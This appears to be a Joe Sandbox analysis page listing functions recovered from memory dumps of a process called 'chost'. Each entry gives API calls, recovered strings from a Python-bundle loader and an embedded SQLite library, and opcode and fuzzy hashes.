Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: 2e410cf13851aeba81fe7b4c3396e602905b6641dc6c9ffad5377d03b7e6117a
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: 6DF04432A1864286F7708F76B4D976A7350EB84764F148279DAAD866D4EF3CD059CB00

Function 00007FFDF70611E0 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FFDF7061205

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 7e95180d38cd00ed8df76aa16efa4cdac9e9adb77db5b2022ed37012a1f49ff9
Instruction ID: e80d1d1e1dd91ecebb70afb7b8c581330908d6b081f27305a6469fd2d4e4eb92
Opcode Fuzzy Hash: 7e95180d38cd00ed8df76aa16efa4cdac9e9adb77db5b2022ed37012a1f49ff9
Instruction Fuzzy Hash: 72A1192AF0AB0785FF588B59B871BB422A1BF54B44F441535C92E877E8DF6CE4A89340

Function 00007FF694361950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF694367F80: _fread_nolock.LIBCMT ref: 00007FF69436802A

_fread_nolock.LIBCMT ref: 00007FF694361A1B

Part of subcall function 00007FF694362910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF694361B6A), ref: 00007FF69436295E

Strings

fseek, xrefs: 00007FF6943619F5
MEI, xrefs: 00007FF694361991
Failed to seek to cookie position!, xrefs: 00007FF6943619EE
fread, xrefs: 00007FF694361A32, 00007FF694361B5C
Could not allocate memory for archive structure!, xrefs: 00007FF694361A61
Failed to read cookie!, xrefs: 00007FF694361A2B
Error on file., xrefs: 00007FF694361B8D
calloc, xrefs: 00007FF694361A68
malloc, xrefs: 00007FF694361B22
Could not read full TOC!, xrefs: 00007FF694361B55
Could not allocate buffer for TOC!, xrefs: 00007FF694361B1B

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: c8a0a089e3ca590a9fb52c076af70129de3e5917c30b35a6c99145ef6d8afee0
Instruction ID: ec4b37d6c3ea0c03a9ced62c6e4a9f40e4ed2a7e83b8c715eb7a5da5b5a35b35
Opcode Fuzzy Hash: c8a0a089e3ca590a9fb52c076af70129de3e5917c30b35a6c99145ef6d8afee0
Instruction Fuzzy Hash: 5D815B71A0CA8786EB709B36D0C62AD73A0EB48784F44C4B9E98DC7796DE3CE545CB40

Function 00007FFDF70B2140 Relevance: 14.4, APIs: 1, Strings: 7, Instructions: 414
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF70B21DA

Strings

sqlite_master, xrefs: 00007FFDF70B215F, 00007FFDF70B22C2, 00007FFDF70B2614
temporary table name must be unqualified, xrefs: 00007FFDF70B220E
%s %T already exists, xrefs: 00007FFDF70B237D
sqlite_temp_master, xrefs: 00007FFDF70B2199, 00007FFDF70B229D
there is already an index named %s, xrefs: 00007FFDF70B23EE
table, xrefs: 00007FFDF70B2275
view, xrefs: 00007FFDF70B226E, 00007FFDF70B2384

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: %s %T already exists$sqlite_master$sqlite_temp_master$table$temporary table name must be unqualified$there is already an index named %s$view
API String ID: 2636501453-2846519077
Opcode ID: eced021f1f1d06cff38bad0d74cb89a79df235ec64024b8df40a4abb3614a0a3
Instruction ID: 7034b502be305348d052efbec1eeb5c0788386a7e82c3ab983d9bdaf8b07821b
Opcode Fuzzy Hash: eced021f1f1d06cff38bad0d74cb89a79df235ec64024b8df40a4abb3614a0a3
Instruction Fuzzy Hash: 3F02AC6AB0878286EB14DB299420BE937A1FF84B84F008235DE6D877D9DF3CE6559700

Function 00007FF694361470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF694361518
fseek, xrefs: 00007FF6943614E5
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6943614DE
Failed to extract %s: failed to open archive file!, xrefs: 00007FF69436149F
fread, xrefs: 00007FF6943615E6
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6943615DF
malloc, xrefs: 00007FF69436151F

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: db21a79d6ecaa01cffc1410e54c6c1bd8d7877d318cfa376b05660dd5540b531
Instruction ID: fbe4bb88f423b63cf7ec68f3a98233567181d92f7e926d74c7dbaf814e6d0848
Opcode Fuzzy Hash: db21a79d6ecaa01cffc1410e54c6c1bd8d7877d318cfa376b05660dd5540b531
Instruction Fuzzy Hash: 73416D31A0868395EF20DB3394825B9B3A1EF44794F84C4BAEE4D87B96DE3CE505CB04

Function 00007FFDF70D44F0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF70D4679

Strings

SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 00007FFDF70D486F
sqlite_master, xrefs: 00007FFDF70D453C
CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text), xrefs: 00007FFDF70D4594
sqlite_temp_master, xrefs: 00007FFDF70D4535
ase, xrefs: 00007FFDF70D477D
table, xrefs: 00007FFDF70D451A

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
API String ID: 2636501453-879093740
Opcode ID: 085563fcc5d81c541c56ca20a765e2d333a69d606b4c0063fede42f7eeced0c1
Instruction ID: 7957154591c1a345a78a813f4ed34c07e598acbd4e7d4a20b4a7ac105986ab71
Opcode Fuzzy Hash: 085563fcc5d81c541c56ca20a765e2d333a69d606b4c0063fede42f7eeced0c1
Instruction Fuzzy Hash: E4E19A2AF0879286EB10CB658060AFC27B5BF45B88F054235EE6D977D9DF38E856D340

Function 00007FF694361210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6943612BA
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF69436141E
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6943612EF
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF694361276
1.3.1, xrefs: 00007FF694361249
malloc, xrefs: 00007FF6943612C1, 00007FF6943612F6

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentProcess
String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
API String ID: 2050909247-2813020118
Opcode ID: edb40a05fb2013712d537a3289a08f064389f77984c6235b46ac1bfe31ed363e
Instruction ID: f813a1856acce7d8b3ba131ce072bca2542d7676ce791fc6517b6d2ab97eca0e
Opcode Fuzzy Hash: edb40a05fb2013712d537a3289a08f064389f77984c6235b46ac1bfe31ed363e
Instruction Fuzzy Hash: 2751A022A0864381EA71AF37A4913BE76A1EF85794F948179ED8DC77D5EE3CE501C700

Function 00007FF6943636B0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32(?,00007FF694363804), ref: 00007FF6943636E1
GetLastError.KERNEL32(?,00007FF694363804), ref: 00007FF6943636EB

Part of subcall function 00007FF694362C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362C9E
Part of subcall function 00007FF694362C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF694363706,?,00007FF694363804), ref: 00007FF694362D63
Part of subcall function 00007FF694362C50: MessageBoxW.USER32 ref: 00007FF694362D99

Strings

Failed to convert executable path to UTF-8., xrefs: 00007FF694363790
GetModuleFileNameW, xrefs: 00007FF6943636FA
Failed to obtain executable path., xrefs: 00007FF6943636F3
\\?\, xrefs: 00007FF69436375A
Failed to resolve full path to executable %ls., xrefs: 00007FF694363739

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
API String ID: 3187769757-2863816727
Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction ID: ad89d284a4f32fd5033b4908fd792bae1f8a9b69c2725c3d8090cf31d9438c3b
Opcode Fuzzy Hash: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
Instruction Fuzzy Hash: D5218361B1864381FA309733EC963BA7250FF88394F40817EE65DC26D5EE2CE505C700

Function 00007FF69437BACC Relevance: 10.8, APIs: 7, Instructions: 290
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69437BEF9

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
Instruction ID: f35ae2f852899ba6825a8f000d08fe4bf3190da51a1e29e64bd24893fb08b0eb
Opcode Fuzzy Hash: 2e9ec559793cd78946ccf1fde0a110b7883fce20fe8558fd890645317879f727
Instruction Fuzzy Hash: C7C1C232A0C686C1E7709B3794802BD7A64EB81B98F55C1B9EA8E877D1CE7CE445C700

Function 00007FFDF7088F80 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 139COMMON

Download Yara Rule

APIs

00007FFE0E142010.VCRUNTIME140(?,?,-8000000000000000,?,00000000,00007FFDF70CD1A0), ref: 00007FFDF708911D

Strings

misuse, xrefs: 00007FFDF7088FD7
API called with NULL prepared statement, xrefs: 00007FFDF7088F94
%s at line %d of [%.10s], xrefs: 00007FFDF7088FE3
8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355, xrefs: 00007FFDF7088FCA
API called with finalized prepared statement, xrefs: 00007FFDF7088FAC

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API called with NULL prepared statement$API called with finalized prepared statement$misuse
API String ID: 2636501453-3538577999
Opcode ID: 0979272ae855488fba6a7c87807590ee704d0abdd9122f51f40eb162d6c7cb87
Instruction ID: c1ad7c1ede0b675913503e2f584f19c7ed1bc05efb9b0ad604708b1b86c46432
Opcode Fuzzy Hash: 0979272ae855488fba6a7c87807590ee704d0abdd9122f51f40eb162d6c7cb87
Instruction Fuzzy Hash: 6051E22AF2D65289FB14AB159430AF863A2AF44B95F488135DE7DC73CDDE3CE446A300

Function 00007FF694366350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF6943663B7
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF694366446
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF6943663F7
LoadLibrary, xrefs: 00007FF69436649E
Failed to load Python DLL '%ls'., xrefs: 00007FF694366497
ucrtbase.dll, xrefs: 00007FF6943663CD

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 225581607e3d707b53bd1f97fb3ed329e7d5d5312be557a59bdbd84c876baa47
Instruction ID: 62e54395bb7fd12c43ef6a8c36fccbdd252edc5485441615264bfcb35107bb73
Opcode Fuzzy Hash: 225581607e3d707b53bd1f97fb3ed329e7d5d5312be557a59bdbd84c876baa47
Instruction Fuzzy Hash: F8418531A1CA8791EA31DB32E4A62E97321FF54384F90817AEA5DC3695EF3CE615C740

Function 00007FFDF705FF80 Relevance: 9.2, APIs: 1, Strings: 4, Instructions: 409fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE ref: 00007FFDF70601BA

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFDF7060296
winOpen, xrefs: 00007FFDF706042D
psow, xrefs: 00007FFDF7060531
exclusive, xrefs: 00007FFDF706014B

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: CreateFile
String ID: delayed %dms for lock/sharing conflict at line %d$exclusive$psow$winOpen
API String ID: 823142352-3829269058
Opcode ID: 5eded3118f2e83f16c663ba3d7be67e2848f18afe53fd57a268d64a342be5141
Instruction ID: c7a9d3823c8bffd379cc0bedad63a951b13ad9b283d9fef523964680ab9943fb
Opcode Fuzzy Hash: 5eded3118f2e83f16c663ba3d7be67e2848f18afe53fd57a268d64a342be5141
Instruction Fuzzy Hash: EC02802AF4964286FB548B25E871EF963A0FF84B44F045235DE6E826ECDF3CE4589704

Function 00007FFDF705D970 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110fileCOMMON

Download Yara Rule

APIs

00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF705D9B4
00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF705D9DD
ReadFile.KERNEL32 ref: 00007FFDF705DA30

Strings

delayed %dms for lock/sharing conflict at line %d, xrefs: 00007FFDF705DAC9
winRead, xrefs: 00007FFDF705DA88

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010$FileRead
String ID: delayed %dms for lock/sharing conflict at line %d$winRead
API String ID: 1078952511-1843600136
Opcode ID: 2d071f0ec14e9f2342e488c5eceac2ac141867fbcd48d604d31c43613abbfcf6
Instruction ID: 6491623289099af55104cdb2f99ec47aae7b6436beacafd4d671dc39ece436ba
Opcode Fuzzy Hash: 2d071f0ec14e9f2342e488c5eceac2ac141867fbcd48d604d31c43613abbfcf6
Instruction Fuzzy Hash: 4741EF3AB08A0282E7109F29A8909E97761FF44780F495137EA6D837ECDF3CE44A9340

Function 00007FF69437F9FC Relevance: 6.2, APIs: 4, Instructions: 162COMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF69437FAEC
_get_daylight.LIBCMT ref: 00007FF69437FAFD
_get_daylight.LIBCMT ref: 00007FF69437FB0E
_isindst.LIBCMT ref: 00007FF69437FBD9

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: _get_daylight$_isindst
String ID:
API String ID: 4170891091-0
Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction ID: 8dc9b4cff8c900db3984dc338a7f4f5afe5aceefb2a42efb15c58efbdadee18a
Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
Instruction Fuzzy Hash: 3E51C172F08112CAEB38DB7699D16BC27A1FB40358F50827DDE5ED2AE5DF38A402C600

Function 00007FF6943757EC Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON

Download Yara Rule

APIs

GetFileType.KERNEL32 ref: 00007FF69437581F
GetFileInformationByHandle.KERNEL32 ref: 00007FF694375881
GetLastError.KERNEL32 ref: 00007FF694375912
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF694375724), ref: 00007FF69437595E

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction ID: 00bf2e322935d1a5631d8eb15c954c4414da0139d4d9ff2793e7f56c777559d0
Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
Instruction Fuzzy Hash: 78513C32E08642CAFB28DF7294903BD23A1EB49B58F148579DE8D97A89DF38D441C740

Function 00007FF694375698 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6943756C5
CreateFileW.KERNEL32 ref: 00007FF694375704
CloseHandle.KERNEL32 ref: 00007FF694375739

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
